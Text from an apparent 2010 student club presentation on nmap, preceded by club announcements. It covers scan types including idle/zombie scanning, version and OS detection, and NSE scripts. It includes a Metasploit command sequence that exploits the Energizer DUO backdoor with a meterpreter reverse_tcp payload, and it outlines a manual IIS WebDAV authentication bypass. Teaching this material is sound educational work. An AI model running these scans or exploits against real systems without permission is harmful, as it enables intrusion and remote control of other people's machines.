4/13/2010

CSS Meeting Stephen Crane on Programming

Contests Tomorrow @ 1pm Building 8 room 345

05/11/10

CSS Programming Contest Friday @ 1pm CS Lab, Building 8

05/11/10

CBARN! Buy your tickets today!▪ $30

Great food! Learn more about other clubs and the

College of Business This Friday @ 7pm

05/11/10

Programming Contest

05/11/10

“Network Mapper” (scanner) Discovery Identification Security Auditing

05/11/10

Scan types Ping:-sP TCP: -sT UDP:-sU SYN: -sS Idle: -sI

05/11/10

Ping: -sP Checks 80, 443 and icmp if root Good way to map the machines on the

network

05/11/10

TCP: -sT TCP Connect scan Full TCP handshake Very “noisey”

05/11/10

UDP: -sU Gives port info only Often forgotten SLOW

05/11/10

SYN: -sS “half open” scanning “quiet” scan Most IDS are on the look out for it

05/11/10

Idle:-sI Zombie scanning Scans a machine using another As far as the scanned machine knows,

our computer never communicated with it

Only located ports, no version info Doesn’t spoof mac address

05/11/10

Advanced Features

Version information (-sV) Attempts to identify the version of the

discovered service Can make mistakes

OS Detection (-O) More or less accurate Can make mistakes

Advanced Features

Verbosity (-v[vv]) Gives more info Very useful grep is your friend

Runtime interaction v/V: Adjust verbosity Spacebar: Print status message

Idle:-sI

05/11/10

Target

Zombie

Us

Demo

Scripting engine Custom written scans Vulnerability scanning & exploitation

(kinda)Written in LUA

05/11/10

Two types: Service scripts Host scripts

Nine categories Auth Default Discovery External Intrusive Malware Safe Version Vuln

05/11/10

Scripts location: /usr/share/nmap/scripts /usr/local/share/nmap/scripts C:\Program Files\Nmap\scripts

nmap –script-updatedbCommand format:

nmap --script=<script_name> target

05/11/10

Scripts

Energizer Trojan IIS webDAV

Energizer Trojan Script

A backdoor was found in the Energizer Charger program

Might have been a mistake We don't really care

Listens on port 7777 of the infected machine

Detection is now built-in to version scan nmap -sV -p7777 target

Energizer Trojan Script

Metasploit! Metasploit has a module that will exploit the

trojan

> use exploit/windows/backdoor/energizer_duo_payload

> set rhost target.ip> set payload windows/meterpreter/reverse_tcp> set lhost your.ip> exploit

IIS WebDAV script

WebDAV allows users on a website to modify files on the webserver A vulnerability was found in IIS 6.0

WebDAV implementation Allows remote authentication bypass

due to a parsing error of UNICODE characters

Nmap has a script!

IIS WebDAV script

The script can identify vulnerable files on the webserver

nmap --script http-iis-webdav-vuln.nse target

IIS WebDAV script

Let's exploit it manually The vulnerable server improperly parses

the UNICODE character '/' (0xc0 0xaf) We'll use telnet to exploit

Extra Stuff

“default” script scan (-sC) Scans using a bunch of different scripts Very noisy, very intrusive Gives you a lot of info

“Aggressive” scan (-A) Uses -O -sV -sC --traceroute Again, very noisy But lots and lots of info

Closing remarks

nmap is a tool you should be familiar with

There are many more techniques and scans that I did not cover

Be mindful of who you are scanning (and any laws regarding scans)

Questions?

References

Nmap main site www.nmap.org nmap.org/book/nse.html

Comprehensive Guide to nmap http://www.networkuptime.com/nmap/index.shtm

l SkullSecurity

http://www.skullsecurity.org/ WebDAV

http://www.exploit-db.com/exploits/8704 Energizer Trojan

http://www.skullsecurity.org/blog/?p=563